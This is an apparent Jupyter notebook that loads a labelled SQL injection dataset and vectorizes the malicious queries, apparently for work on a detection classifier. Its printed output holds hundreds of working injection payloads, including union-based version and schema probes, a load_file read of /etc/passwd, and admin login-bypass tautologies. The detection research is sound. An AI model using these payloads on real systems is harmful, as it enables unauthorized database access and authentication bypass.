In [1]:
import pandas as pd
import numpy as np

In [2]:
df= pd.read_excel(r'sqli.xlsx', engine='openpyxl')
df = df.fillna('')
df

,Query,Label,Unnamed: 2,Unnamed: 3,Unnamed: 4,Unnamed: 5,Unnamed: 6,Unnamed: 7
0,) union select * from information_schema.tab...,MD,,,,,,
1,"1 union all select 1,2,3,4,5,6,name from sysob...",MD,,,,,,
2,union all select @@version--,MD,,,,,,
3,union select * from users where login = cha...,MD,,,,,,
4,union select,MD,,,,,,
...,...,...,...,...,...,...,...,...
1994,"Their motto , large billboard stated &quot; W...",NV,,,,,,
1995,In wanted point danger even bigger ruins Schw...,NV,,,,,,
1996,Chatting many people passing &quot; construct...,NV,,,,,,
1997,"However , beginning resign town continues sta...",NV,,,,,,
1998,We told public statements made Mayor also imp...,NV,,,,,,

In [3]:
 from sklearn.feature_extraction.text import CountVectorizer
df_MD = [row['Query'] for index,row in df.iterrows() if row['Label'] == 'MD']
df_MD

[' )  union select * from information_schema.tables;',
 "1 union all select 1,2,3,4,5,6,name from sysobjects where xtype  =  'u' --",
 ' union all select @@version--',
 ' union select * from users where login  =  char ( 114,111,111,116 ) ;',
 ' union select',
 " union select 1,load_file ( '/etc/passwd' ) ,1,1,1;",
 ' union  ( select @@version )  --',
 ' union  ( select NULL,  ( select @@version  )  )   --',
 ' union  ( select NULL, NULL,  ( select @@version  )  )   --',
 ' union  ( select NULL, NULL, NULL,   ( select @@version  )  )   --',
 ' union  ( select NULL, NULL, NULL, NULL,   ( select @@version  )  )   --',
 ' union  ( select NULL, NULL, NULL, NULL,  NULL,  ( select @@version  )  )   --',
 ' 1 + ( \\ )  union select null,@@VERSION -- 1',
 ' 1.&&1 union select 1,version (  )  -- 1',
 ' 1.&&@ union select 1,version (  )  -- 1',
 ' 1 +  ( \\. )  union select null,@@VERSION -- 1',
 ' 1.  union select 1,version (  )  -- 1',
 ' 1. union select 1,banner from v$version where rownum = 1 -- 1',
 '1.  union select version (  ) ,version (  )  -- 1',
 ' 1. union select null,version (  )  -- 1',
 ' 1 +\\. union select null,@@VERSION -- 1',
 ' 1. union select null,banner from v$version where rownum = 1 -- 1',
 '1.<@. union select 1,version (  )  -- 1',
 '1.*1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' 1.<1# union select 1,version (  )  -- 1',
 ' 1. <@ union select version (  ) ,version (  )  -- 1',
 ' 1.*\\ union select null,@@VERSION -- 1',
 ' 1.<@$ union select 1,version (  )  -- 1',
 ' 1.%@ union select 1,version (  )  -- 1',
 '11||1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' 1 + ( 1 )  union select 1,banner from v$version where rownum = 1 -- 1',
 '1 + ( 1 )  union select null,banner from v$version where rownum = 1 -- 1',
 ' 1 +1 union select 1,banner from v$version where rownum = 1 -- 1',
 '1 +1 union select null,banner from v$version where rownum = 1 -- 1',
 ' 11<1# union select 1,version (  )  -- 1',
 ' 1 +  ( \\+ )  union select null,@@VERSION -- 1',
 ' 1.<1# union select 1,version (  )  -- 1',
 ' 1 +\\+. union select null,@@VERSION -- 1',
 ' 1 -1<@ union select 1,version (  )  -- 1',
 ' 1 +1<@ union select version (  ) ,version (  )  -- 1',
 ' 1 +1<@ union select null,version (  )  -- 1',
 '  1 + \\+%1 union select null,@@VERSION -- 1',
 '1 + \\+*\\ union select null,@@VERSION -- 1',
 ' 1 + \\+*$ union select null,@@VERSION -- 1',
 ' 1 union select  ( 1 ) ,banner from v$version where rownum = 1 -- 1',
 ' 1 union select 1||1,version (  )  -- 1',
 ' 1 union select 1||@,version (  )  -- 1',
 ' 1 union select 1 1$,version (  )  -- 1',
 '1 union select 1 $,version (  )  -- 1',
 ' 1 union select 1 1a,version (  )  -- 1',
 '1 union select 1<@$,version (  )  -- 1',
 ' 1 union select 1,banner from v$version where rownum = 1 -- 1',
 '1 union select .1_,version (  )  -- 1',
 ' 1 union select 1`\\`,version (  )  -- 1',
 ' 1 union select 1a#,banner from v$version where rownum = 1 -- 1',
 ' 1 union select 1a,banner from v$version where rownum = 1 -- 1',
 ' 1 union select .1$_,version (  )  -- 1',
 '1 union select 1<@,version (  )  -- 1',
 ' 1 union select 1<@.,version (  )  -- 1',
 '1 union select 1 $$,version (  )  -- 1',
 '1 union select !<1,version (  )  -- 1',
 ' 1 union select +!<1,version (  )  -- 1',
 '1 union select +!<@,version (  )  -- 1',
 '1 union select !<@,version (  )  -- 1',
 '  1 union select @||1,version (  )  -- 1',
 ' 1 union select @&&@,version (  )  -- 1',
 ' 1 union select @ 1$,version (  )  -- 1',
 ' 1 union select  @ $,version (  )  -- 1',
 ' 1 union select @ 1a,version (  )  -- 1',
 ' 1 union select @<@$,version (  )  -- 1',
 ' 1   union select null,banner from v$version where rownum = 1 -- 1',
 ' 1 union select @ _,version (  )  -- 1',
 ' 1 union select @ $_,version (  )  -- 1',
 ' 1 union select @<@,version (  )  -- 1',
 ' 1 union select @<@.,version (  )  -- 1',
 '1 union select @ $$,version (  )  -- 1',
 ' 1 +$ . union select null,@@VERSION -- 1',
 ' 1 +$ 1 union select null,@@VERSION -- 1',
 ' 1 +  ( $+ )  union select null,@@VERSION -- 1',
 ' 1 +$+. union select null,@@VERSION -- 1',
 ' 1 +$+ union select null,@@VERSION -- 1',
 '  1 + $+%1 union select null,@@VERSION -- 1',
 '1 + $+*\\ union select null,@@VERSION -- 1',
 ' 1 + $+*$ union select null,@@VERSION -- 1',
 ' * ( \\ )  union select null,@@VERSION -- 1',
 ' 1 * ( 1 )  union select 1,banner from v$version where rownum = 1 -- 1',
 ' 1<@.. union select 1,version (  )  -- 1',
 ' 1 <@. union select 1,version (  )  -- 1',
 ' 1  <@. union select version (  ) ,version (  )  -- 1',
 '1 *\\. union select null,@@VERSION -- 1',
 '1 <@.$ union select 1,version (  )  -- 1',
 '1 *1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' 1 *1 union select null,banner from v$version where rownum = 1 -- 1',
 ' 1 <1## union select 1,version (  )  -- 1',
 ' 1 <@1$ union select 1,version (  )  -- 1',
 '1 *\\ union select null,@@VERSION -- 1',
 ' 1 *$ . union select null,@@VERSION -- 1',
 '  1 %$ 1 union select null,@@VERSION -- 1',
 ' 1 <@$_ union select 1,version (  )  -- 1',
 '1 | |1 union select 1,banner from v$version where rownum = 1 -- 1',
 '1<@<@ union select 1,version (  )  -- 1',
 '1 <@<@ union select version (  ) ,version (  )  -- 1',
 ' 1 <@<@ union select null,version (  )  -- 1',
 ' 1 <@&@ union select 1,version (  )  -- 1',
 ' 1 <@$$ union select 1,version (  )  -- 1',
 " '1' ||1 union select 1,banner from v$version where rownum = 1 -- 1'",
 ' \'1\' union select ";"_,version (  )  -- 1\'',
 ' \'1\' union select $["],@@VERSION -- 1\'',
 ' \'1\' union select "?"_,version (  )  -- 1\'',
 "1' union select ||/1,version (  )  -- 1'",
 " '1' union select  ( \\ ) ,@@VERSION -- 1'",
 "1' union select  ( \\. ) ,@@VERSION -- 1'",
 " '1' union select  ( 1 ) ,banner from v$version where rownum = 1 -- 1'",
 " '1' union select \\,@@VERSION -- 1'",
 " '1' union select \\.,@@VERSION -- 1'",
 "1' union select \\.#,@@VERSION -- 1'",
 "1' union select \\.%1,@@VERSION -- 1'",
 " '1' union select 1,banner from v$version where rownum = 1 -- 1'",
 " '1' union select 1a,banner from v$version where rownum = 1 -- 1'",
 ' \'1\' union select 1"!",banner from v$version where rownum = 1 -- 1\'',
 " '1' union select \\#,@@VERSION -- 1'",
 " '1' union select $ .,@@VERSION -- 1'",
 "1' union select $ _,@@VERSION -- 1'",
 " '1' union select $*$,@@VERSION -- 1'",
 " '1' union select +\\,@@VERSION -- 1'",
 " '1' union select +\\.,@@VERSION -- 1'",
 " '1' union select !<1,version (  )  -- 1'",
 " '1' union select +\\#,@@VERSION -- 1'",
 " '1' union select !<@,version (  )  -- 1'",
 "1' union select @ 1,version (  )  --  1'",
 " '1'   union select null,banner from v$version where rownum = 1 -- 1'",
 "1' union select @ @1,version (  )  --  1'",
 ' \'1\' union select "["_,version (  )  -- 1\'',
 " '1' +  ( \\ )  union select 1,@@VERSION -- 1'",
 " '1' +  ( \\. )  union select 1,@@VERSION -- 1'",
 " '1' * ( 1 )  union select 1,banner from v$version where rownum = 1 -- 1'",
 " '1'<@.. union select 1,version (  )  -- 1'",
 " '1' <@._ union select 1,version (  )  -- 1'",
 " '1' + 1||1 union select 1,banner from v$version where rownum = 1 -- 1'",
 " '1' *1 union select 1,banner from v$version where rownum = 1 -- 1'",
 " '1' + @<@# union select 1,version (  )  -- 1'",
 " '1' + $ . union select 1,@@VERSION -- 1'",
 "1' <@$_ union select 1,version (  )  -- 1'",
 " '1' <@&1 union select 1,version (  )  -- 1'",
 "1' <@<@ union select 1,version (  )  -- 1'",
 " '1' + $+*$ union select 1,@@VERSION -- 1'",
 " '1' %!<@ union select 1,version (  )  -- 1'",
 " '1'<@$$ union select 1,version (  )  -- 1'",
 " '1' + @ ( 1 )  union select 1,version (  )  -- 1'",
 " '1' + @ 1 union select 1,version (  )  -- 1'",
 " '1' + @ 1! union select 1,version (  )  -- 1'",
 " '1' + @ @1 union select 1,version (  )  -- 1'",
 ' 1 + @`\\` union select 1,version (  )  -- 1',
 ' 1 + @<1# union select 1,version (  )  -- 1',
 ' 1 + @<@. union select 1,version (  )  -- 1',
 '1 -@<@ union select 1,version (  )  -- 1',
 '1 -@<@ union select version (  ) ,version (  )  -- 1',
 ' 1 -@<@ union select null,version (  )  -- 1',
 ' 1 + @<@# union select null,version (  )  -- 1',
 "1234 ' AND 1 = 0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",
 '1234 " AND 1 = 0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055',
 '\\x27UNION SELECT',
 "' UNION SELECT",
 "' UNION ALL SELECT",
 ' UNION ALL SELECT',
 ' union select',
 ' union select * from users where login  =  char ...',
 "' UNION SELECT",
 "' UNION ALL SELECT",
 ' UNION 1=1 ;',
 "' UNION 1=1 #",
 "' UNION 1=1 -- --",
 "' UNION 1=1 -- #",
 "' UNION 1=1 -- %",
 "' UNION 1=1 -- '",
 "' UNION 1=2 ;",
 "' UNION 1=2 #",
 "' UNION 1=2 -- --",
 "' UNION 1=2 -- #",
 "' UNION 1=2 -- %",
 "' UNION 1=2 -- '",
 "' UNION 2=1 ;",
 "' UNION 2=1 #",
 "' UNION 2=1 -- --",
 "' UNION 2=1 -- #",
 "' UNION 2=1 -- %",
 "' UNION 2=1 -- '",
 "' UNION 2=2 ;",
 "' UNION 2=2 #",
 "' UNION 2=2 -- --",
 "' UNION 2=2 -- #",
 "' UNION 2=2 -- %",
 "' UNION 2=2 -- '",
 "' UNION a=a ;",
 "' UNION a=a #",
 "' UNION a=a -- --",
 "' UNION a=a -- #",
 "' UNION a=a -- %",
 "' UNION a=a -- '",
 "' UNION a=b ;",
 "' UNION a=b #",
 "' UNION a=b -- --",
 "' UNION a=b -- #",
 "' UNION a=b -- %",
 "' UNION a=b -- '",
 "' UNION b=a ;",
 "' UNION b=a #",
 "' UNION b=a -- --",
 "' UNION b=a -- #",
 "' UNION b=a -- %",
 "' UNION b=a -- '",
 "' UNION b=b ;",
 ' UNION b=b # ',
 ' UNION b=b -- --',
 " ' UNION b=b -- #",
 " ' UNION b=b -- %",
 "  ' union all select 1=1 ; ",
 ' union all select 1=1 # ',
 ' union all select 1=1 -- --',
 " ' union all select 1=1 -- # ",
 " ' union all select 1=1 -- % ",
 " ' union all select 1=1 -- '",
 " ' union all select 1=2 ; ",
 "  ' union all select 1=2 #",
 "  ' union all select 1=2 -- -- ",
 ' union all select 1=2 -- #',
 "' union all select 1=2 -- %",
 "' union all select 1=2 -- '",
 "' union all select 2=1 ;",
 "' union all select 2=1 #",
 "' union all select 2=1 -- --",
 "' union all select 2=1 -- #",
 "' union all select 2=1 -- %",
 "' union all select 2=1 -- '",
 "' union all select 2=2 ;",
 "' union all select 2=2 #",
 "' union all select 2=2 -- --",
 "' union all select 2=2 -- #",
 "' union all select 2=2 -- %",
 "' union all select 2=2 -- '",
 "' union all select a=a ;",
 "' union all select a=a #",
 "' union all select a=a -- --",
 "' union all select a=a -- #",
 "' union all select a=a -- %",
 "' union all select a=a -- '",
 ' union all select a=b ;',
 "' union all select a=b #",
 "' union all select a=b -- --",
 "' union all select a=b -- #",
 "' union all select a=b -- %",
 "' union all select a=b -- '",
 "' union all select b=a ;",
 "' union all select b=a #",
 "' union all select b=a -- --",
 "' union all select b=a -- #",
 "' union all select b=a -- %",
 "' union all select b=a -- '",
 "' union all select b=b ;",
 "' union all select b=b #",
 " ' union all select b=b -- -- ",
 " ' union all select b=b -- #",
 " ' union all select b=b -- %",
 " ' union select 1,2 -- 1=1 ;",
 " ' union select 1,2 -- 1=1 # ",
 " ' union select 1,2 -- 1=1 -- --",
 " ' union select 1,2 -- 1=1 -- #",
 "' union select 1,2 -- 1=2 ;",
 "' union select 1,2 -- 1=2 #",
 "' union select 1,2 -- 1=2 -- --",
 "' union select 1,2 -- 1=2 -- #",
 "' union select 1,2 -- 1=2 -- %",
 "' union select 1,2 -- 1=2 -- '",
 "' union select 1,2 -- 2=1 ;",
 " ' union select 1,2 -- 2=1 #",
 "' union select 1,2 -- 2=1 -- --",
 "' union select 1,2 -- 2=1 -- #",
 "' union select 1,2 -- 2=1 -- %",
 "' union select 1,2 -- 2=1 -- '",
 "' union select 1,2 -- 2=2 ;",
 "' union select 1,2 -- 2=2 #",
 ' union select 1,2 -- 2=2 ----',
 'union select 1,2 -- 2=2 -- #',
 "' union select 1,2 -- 2=2 -- %",
 "' union select 1,2 -- 2=2 -- '",
 "' union select 1,2 -- a=a ;",
 "' union select 1,2 -- a=a #",
 "' union select 1,2 -- a=a -- --",
 "' union select 1,2 -- a=a -- #",
 ' union select 1,2 -- a=a -- %',
 " union select 1,2 -- a=a --'",
 "' union select 1,2 -- a=b ;",
 "' union select 1,2 -- a=b #",
 "' union select 1,2 -- a=b -- --",
 "' union select 1,2 -- a=b -- #",
 "' union select 1,2 -- a=b -- %",
 "' union select 1,2 -- a=b -- '",
 "' union select 1,2 -- b=a ;",
 "' union select 1,2 -- b=a #",
 " ' union select 1,2 -- b=a ----",
 " ' union select 1,2 -- b=a -- # ",
 " ' union select 1,2 -- b=a -- % ",
 " ' union select 1,2 -- b=a -- ' ",
 ' union select 1,2 -- b=b ;',
 " ' union select 1,2 -- b=b # ",
 " ' union select 1,2 -- b=b -- -- ",
 " ' union select 1,2 -- b=b -- #",
 " ' union select 1,2 -- b=b -- %' ",
 "union select 1,2 -- b=b --'",
 "' UNION ALL SELECT @@datadir, 1 -- 1=1 ;",
 "' UNION ALL SELECT @@datadir, 1 -- 1=1 #",
 "' UNION ALL SELECT @@datadir, 1 -- 1=1 -- --",
 "' UNION ALL SELECT @@datadir, 1 -- 1=1 -- #",
 "' UNION ALL SELECT @@datadir, 1 -- 1=1 -- %",
 "' UNION ALL SELECT @@datadir, 1 -- 1=1 -- '",
 "' UNION ALL SELECT @@datadir, 1 -- 1=2 ;",
 "' UNION ALL SELECT @@datadir, 1 -- 1=2 #",
 ' UNION ALL SELECT@@datadir, 1 -- 1=2 -- --',
 ' UNION ALL SELECT @@datadir, 1 -- 1=2 -- #',
 ' UNION ALL SELECT @@datadir, 1 -- 1=2 -- %',
 "' UNION ALL SELECT @@datadir, 1 -- 1=2 -- '",
 "' UNION ALL SELECT @@datadir, 1 -- 2=1 ;",
 "' UNION ALL SELECT @@datadir, 1 -- 2=1 #",
 "' UNION ALL SELECT @@datadir, 1 -- 2=1 -- --",
 "' UNION ALL SELECT @@datadir, 1 -- 2=1 -- #",
 "' UNION ALL SELECT @@datadir, 1 -- 2=1 -- %",
 "' UNION ALL SELECT @@datadir, 1 -- 2=1 -- '",
 "' UNION ALL SELECT @@datadir, 1 -- 2=2 ;",
 "' UNION ALL SELECT @@datadir, 1 -- 2=2 #",
 "' UNION ALL SELECT @@datadir, 1 -- 2=2 -- --",
 "' UNION ALL SELECT @@datadir, 1 -- 2=2 -- #",
 "' UNION ALL SELECT @@datadir, 1 -- 2=2 -- %",
 "' UNION ALL SELECT @@datadir, 1 -- 2=2 -- '",
 "' UNION ALL SELECT @@datadir, 1 -- a=a ;",
 "' UNION ALL SELECT @@datadir, 1 -- a=a #",
 "' UNION ALL SELECT @@datadir, 1 -- a=a -- --",
 "' UNION ALL SELECT @@datadir, 1 -- a=a -- #",
 "' UNION ALL SELECT @@datadir, 1 -- a=a -- %",
 "' UNION ALL SELECT @@datadir, 1 -- a=a -- '",
 "' UNION ALL SELECT @@datadir, 1 -- a=b ;",
 "' UNION ALL SELECT @@datadir, 1 -- a=b #",
 "' UNION ALL SELECT @@datadir, 1 -- a=b -- --",
 ' UNION ALL SELECT @@datadir, 1 -- a=b -- #',
 "' UNION ALL SELECT @@datadir, 1 -- a=b -- %",
 "' UNION ALL SELECT @@datadir, 1 -- a=b -- '",
 "' UNION ALL SELECT @@datadir, 1 -- b=a ;",
 "' UNION ALL SELECT @@datadir, 1 -- b=a #",
 "' UNION ALL SELECT @@datadir, 1 -- b=a -- --",
 "' UNION ALL SELECT @@datadir, 1 -- b=a -- #",
 "' UNION ALL SELECT @@datadir, 1 -- b=a -- %",
 "' UNION ALL SELECT @@datadir, 1 -- b=a -- '",
 "' UNION ALL SELECT @@datadir, 1 -- b=b ;",
 "' UNION ALL SELECT @@datadir, 1 -- b=b #",
 "' UNION ALL SELECT @@datadir, 1 -- b=b -- --",
 "' UNION ALL SELECT @@datadir, 1 -- b=b -- #",
 "' UNION ALL SELECT @@datadir, 1 -- b=b -- %",
 "' UNION ALL SELECT @@datadir, 1 -- b=b -- '",
 " ' union select 1 -- b=a -- - - ",
 ' union select 1 -- b=a -- # ',
 " ' union select 1 -- b=a -- % ",
 " ' union select 1 -- b=a -- '",
 " ' union select 1 -- b=b ; ",
 " ' union select 1 -- b=b # ",
 " ' union select 1 -- b=b -- - -",
 " ' union select 1 -- b=b -- # ",
 " ' union select 1 -- b=b -- %",
 " ' union select 1 -- b=b -- '",
 "union all select b=b -- ' ",
 ' union select 1 -- 1=1 ; ',
 ' union select 1 -- 1=1 #',
 " ' union select 1 -- 1=1 -- - -",
 " ' union select 1 -- 1=1 -- # ",
 ' union select 1 -- 1=1 -- % ',
 " union select 1 -- 1=1 -- ' ",
 ' union select 1 -- 1=2 ; ',
 ' union select 1 -- 1=2 # ',
 ' union select 1 -- 1=2 -- - - ',
 ' union select 1 -- 1=2 -- #',
 " ' union select 1 -- 1=2 -- % ",
 " union select 1 -- 1=2 -- '",
 " ' union select 1 -- 2=1 ; ",
 ' union select 1 -- 2=1 #',
 " ' union select 1 -- 2=1 -- - - ",
 ' union select 1 -- 2=1 -- # ',
 ' union select 1 -- 2=1 -- % ',
 " union select 1 -- 2=1 -- ' ",
 ' union select 1 -- 2=2 ; ',
 ' union select 1 -- 2=2 # ',
 ' union select 1 -- 2=2 -- - - ',
 " union select 1 -- 2=2 -- # '",
 ' union select 1 -- 2=2 -- % ',
 " union select 1 -- 2=2 -- ' ",
 ' union select 1 -- a=a -- % ',
 " union select 1 -- a=a -- ' ",
 ' union select 1 -- a=b ;',
 " ' union select 1 -- a=b #",
 " ' union select 1 -- a=b -- - - ",
 ' union select 1 -- b=a -- # ',
 ' union select 1 -- b=a -- % ',
 " union select 1 -- b=a -- ' ",
 ' union select 1 -- b=b ; ',
 ' union select 1 -- b=b #',
 " ' union select 1 -- b=b -- - - ",
 ' union select 1 -- b=b -- # ',
 ' union select 1 -- b=b -- % ',
 "' union select 1 -- b=b -- '",
 ' union select 1 -- a=a ; ',
 ' union select 1 -- a=a # ',
 ' union select 1 -- a=a -- -- ',
 "' union select 1 -- a=a -- #",
 " UNION b=b -- ' ",
 ' UNION select 1=1 ;',
 " ' UNION select 1=1 # ",
 " ' UNION select 1=1 -- -- ",
 " ' UNION select 1=1 -- # ",
 " ' UNION select 1=1 -- % ",
 " ' UNION select 1=1 -- ' ",
 " ' UNION select 1=2 ; ",
 " ' UNION select 1=2 # ",
 " ' UNION select 1=2 -- -- ",
 " ' UNION select 1=2 -- # ",
 " ' UNION select 1=2 -- % ",
 " ' UNION select 1=2 -- '",
 " ' UNION select 2=1 ; ",
 " ' UNION select 2=1 # ",
 " ' UNION select 2=1 -- -- ",
 ' UNION select 2=2 -- --',
 ' UNION select 2=1 -- #',
 ' UNION select 2=2 -- %',
 "' UNION select 2=2 -- '",
 ' UNION select a=a ;',
 ' UNION select a=a #',
 "' UNION select a=a -- --",
 "' UNION select a=a -- #",
 "' UNION select a=a -- %",
 "' UNION select a=a -- '",
 "' UNION select a=b ;",
 "' UNION select a=b #",
 "' UNION select a=b -- --",
 "' UNION select a=b -- #",
 "' UNION select a=b -- %",
 "' UNION select a=b -- '",
 "' UNION select b=a ;",
 "' UNION select b=a #",
 "' UNION select b=a -- --",
 "' UNION select b=a -- #",
 "' UNION select b=a -- %",
 "' UNION select b=a -- '",
 "' UNION select b=b ;",
 "' UNION select b=b #",
 "' UNION select b=b -- --",
 "' UNION select b=b -- #",
 "' UNION select b=b -- %",
 "' UNION select b=b -- '",
 "1 union all select 1,2,3,4,5,6,name from sysobjects where xtype  =  'u' --"]

In [4]:
vec = CountVectorizer()

In [5]:
l=vec.fit_transform(df_MD)
print(l.toarray())

[[0 0 0 ... 0 0 0]
 [0 0 0 ... 1 0 1]
 [0 0 0 ... 0 0 0]
 ...
 [0 0 0 ... 0 0 0]
 [0 0 0 ... 0 0 0]
 [0 0 0 ... 1 0 1]]

In [6]:
 print(vec.get_feature_names())

['11', '111', '114', '116', '1234', '1_', '1a', '81dc9bdb52d04dc20036dbd8313ed055', 'admin', 'all', 'and', 'banner', 'char', 'datadir', 'etc', 'from', 'information_schema', 'load_file', 'login', 'name', 'null', 'passwd', 'rownum', 'select', 'sysobjects', 'tables', 'union', 'users', 'version', 'where', 'x27union', 'xtype']

In [7]:
# print(l.toarray())
table_MD=pd.DataFrame(l.toarray(), columns=vec.get_feature_names())
table_MD

,11,111,114,116,1234,1_,1a,81dc9bdb52d04dc20036dbd8313ed055,admin,all,...,rownum,select,sysobjects,tables,union,users,version,where,x27union,xtype
0,0,0,0,0,0,0,0,0,0,0,...,0,1,0,1,1,0,0,0,0,0
1,0,0,0,0,0,0,0,0,0,1,...,0,1,1,0,1,0,0,1,0,1
2,0,0,0,0,0,0,0,0,0,1,...,0,1,0,0,1,0,1,0,0,0
3,0,2,1,1,0,0,0,0,0,0,...,0,1,0,0,1,1,0,1,0,0
4,0,0,0,0,0,0,0,0,0,0,...,0,1,0,0,1,0,0,0,0,0
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
450,0,0,0,0,0,0,0,0,0,0,...,0,1,0,0,1,0,0,0,0,0
451,0,0,0,0,0,0,0,0,0,0,...,0,1,0,0,1,0,0,0,0,0
452,0,0,0,0,0,0,0,0,0,0,...,0,1,0,0,1,0,0,0,0,0
453,0,0,0,0,0,0,0,0,0,0,...,0,1,0,0,1,0,0,0,0,0
454,0,0,0,0,0,0,0,0,0,1,...,0,1,1,0,1,0,0,1,0,1

In [8]:
df_HG = [row['Query'] for index,row in df.iterrows() if row['Label'] == 'HG']
df_HG

["' OR 1=1 ;",
 "' OR 1=1 -- --",
 "' OR 1=1 -- #",
 "' OR 1=1 -- %",
 "' OR 1=1 -- '",
 "' OR 1=1 #",
 "' OR 1=2 ;",
 "' OR 1=2 -- --",
 "' OR 1=2 -- #",
 "' OR 1=2 -- %",
 "' OR 1=2 -- '",
 "' OR 1=2 #",
 "' OR 2=1 ;",
 "' OR 2=1 -- --",
 "' OR 2=1 -- #",
 "' OR 2=1 -- %",
 "' OR 2=1 -- '",
 "' OR 2=1 #",
 "' OR 2=2 ;",
 "' OR 2=2 -- --",
 "' OR 2=2 -- #",
 "' OR 2=2 -- %",
 "' OR 2=2 -- '",
 "' OR 2=2 #",
 "' OR a=a ;",
 "' OR a=a -- --",
 "' OR a=a -- #",
 "' OR a=a -- %",
 "' OR a=a -- '",
 "' OR a=a #",
 "') OR 1=1 ;",
 "') OR 1=1 -- --",
 "') OR 1=1 -- #",
 "') OR 1=1 -- %",
 "') OR 1=1 -- '",
 "') OR 1=1 #",
 "') OR 1=2 ;",
 "') OR 1=2 -- --",
 "') OR 1=2 -- #",
 "') OR 1=2 -- %",
 "') OR 1=2 -- '",
 ') OR 1=2 #',
 "') OR 2=1 ;",
 "') OR 2=1 -- --",
 "') OR 2=1 -- #",
 "') OR 2=1 -- %",
 "') OR 2=1 -- '",
 "') OR 2=1 #",
 "') OR 2=2 ;",
 "') OR 2=2 -- --",
 "'] OR a=a #",
 "'] OR a=a -- '",
 "'] OR a=a -- %",
 "'] OR a=a -- #",
 "'] OR a=a -- --",
 "'] OR a=a ;",
 "'] OR 2=2 #",
 "'] OR 2=2 -- '",
 "'] OR 2=2 -- %",
 "'] OR 2=2 -- #",
 "'] OR 2=2 -- --",
 "'] OR 2=2 ;",
 "'] OR 2=1 #",
 "'] OR 2=1 -- '",
 "'] OR 2=1 -- %",
 "'] OR 2=1 -- #",
 "'] OR 2=1 -- --",
 "'] OR 2=1 ;",
 "'] OR 1=2 #",
 "'] OR 1=2 -- '",
 "'] OR 1=2 -- %",
 "'] OR 1=2 -- #",
 "'] OR 1=2 -- --",
 "'] OR 1=2 ;",
 "'] OR 1=1 #",
 "'] OR 1=1 -- '",
 "'] OR 1=1 -- %",
 "'] OR 1=1 -- #",
 "'] OR 1=1 -- --",
 "'] OR 1=1 ;",
 "') OR a=a #",
 "') OR a=a -- '",
 "') OR a=a -- %",
 "') OR a=a -- #",
 "') OR a=a -- --",
 "') OR a=a ;",
 "') OR 2=2 #",
 "') OR 2=2 -- '",
 "') OR 2=2 -- %",
 "') OR 2=2 -- #",
 '" OR 1=1 ;',
 '" OR 1=1 -- --',
 "' OR 1=1 -- #",
 '" OR 1=1 -- %',
 "' OR 1=1 -- '",
 '" OR 1=1 #',
 '" OR 1=2 ;',
 '" OR 1=2 -- --',
 '" OR 1=2 -- #',
 '" OR 1=2 -- %',
 '" OR 1=2 -- \'',
 '" OR 1=2 #',
 '" OR 2=1 ;',
 '" OR 2=1 -- --',
 '" OR 2=1 -- #',
 '" OR 2=1 -- %',
 '" OR 2=1 -- \'',
 '" OR 2=1 #',
 '" OR 2=2 ;',
 '" OR 2=2 -- --',
 '" OR 2=2 -- #',
 '" OR 2=2 -- %',
 '" OR 2=2 -- \'',
 '" OR 2=2 #',
 '" OR a=a ;',
 '" OR a=a -- --',
 '" OR a=a -- #',
 '" OR a=a -- %',
 '" OR a=a -- \'',
 '" OR a=a #',
 "a' or 1 = 1; --",
 '? or 1 = 1 --',
 "anything' or 'x' = 'x",
 "x' or full_name like '%bob%",
 '23 or 1 = 1; --',
 " or username is not NULL or username  =  '",
 '" or isNULL ( 1/0 )  /*',
 " or '7659' = '7659",
 '" or isNULL ( 1/0 )  /*',
 "admin' or '",
 ' or 1 in  ( select @@version ) --',
 " or 'unusual'  =  'unusual'",
 " or 'something'  =  'some'+'thing'",
 " or 'text'  =  n'text'",
 '/**/or/**/1/**/ = /**/1',
 ' or 1/*',
 " or '7659' = '7659",
 " or '' '",
 " or ''&'",
 " or ''^'",
 " or ''*'",
 '" or ""-"',
 '" or "" "',
 '" or ""&"',
 '" or ""^"',
 '" or ""*"',
 'or true--',
 '" or true--',
 ' or true--',
 '" )  or true--',
 ' )  or true--',
 " or 'x' = 'x",
 " )  or  ( 'x' )  =  ( 'x",
 "  )  )   or   (  (  'x'  )  )   =   (  (  'x",
 '" or "x" = "x',
 '" )  or  ( "x" )  =  ( "x',
 '"  )  )   or   (  (  "x"  )  )   =   (  (  "x',
 'or 1 = 1',
 'or 1 = 1-- ',
 'or 1 = 1#',
 'or 1 = 1/*',
 "admin' or '1' = '1",
 "admin' or '1' = '1'--",
 "admin' or '1' = '1'#",
 "admin' or '1' = '1'/*",
 "admin'or 1 = 1 or '' = '",
 "admin' or 1 = 1",
 "admin' or 1 = 1--",
 "admin' or 1 = 1#",
 "admin' or 1 = 1/*",
 "admin' )  or  ( '1' = '1",
 "admin' )  or  ( '1' = '1'--",
 "admin' )  or  ( '1' = '1'#",
 "admin' )  or  ( '1' = '1'/*",
 "admin' )  or '1' = '1",
 "admin' )  or '1' = '1'--",
 "admin' )  or '1' = '1'#",
 "admin' )  or '1' = '1'/*",
 'admin" or "1" = "1',
 'admin" or "1" = "1"--',
 'admin" or "1" = "1"#',
 'admin" or "1" = "1"/*',
 'admin"or 1 = 1 or "" = "',
 'admin" or 1 = 1',
 'admin" or 1 = 1--',
 'admin" or 1 = 1#',
 'admin" or 1 = 1/*',
 'admin" )  or  ( "1" = "1',
 'admin" )  or  ( "1" = "1"--',
 'admin" )  or  ( "1" = "1"#',
 'admin" )  or  ( "1" = "1"/*',
 'admin" )  or "1" = "1',
 'admin" )  or "1" = "1"--',
 'admin" )  or "1" = "1"#',
 'admin" )  or "1" = "1"/*',
 "a' or 1 = 1--",
 '"a"" or 1 = 1--"',
 ' or a  =  a',
 "a' or 'a'  =  'a",
 '1 or 1 = 1',
 "x' OR full_name LIKE '%Bob%",
 " or '' = '",
 " or 'x' = 'x",
 ' or x = x',
 " )  or  ( 'x' = 'x",
 '0 or 1 = 1',
 ' or 0 = 0 --',
 '" or 0 = 0 --',
 'or 0 = 0 --',
 ' or 0 = 0 #',
 ' or 0 = 0 #"',
 'or 0 = 0 #',
 ' or 1 = 1--',
 '" or 1 = 1--',
 " or '1' = '1'--",
 " or 1 --'",
 'or 1 = 1--',
 'or 1 = 1',
 'or 1 = 1 --',
 " or 1 = 1 or '' = '",
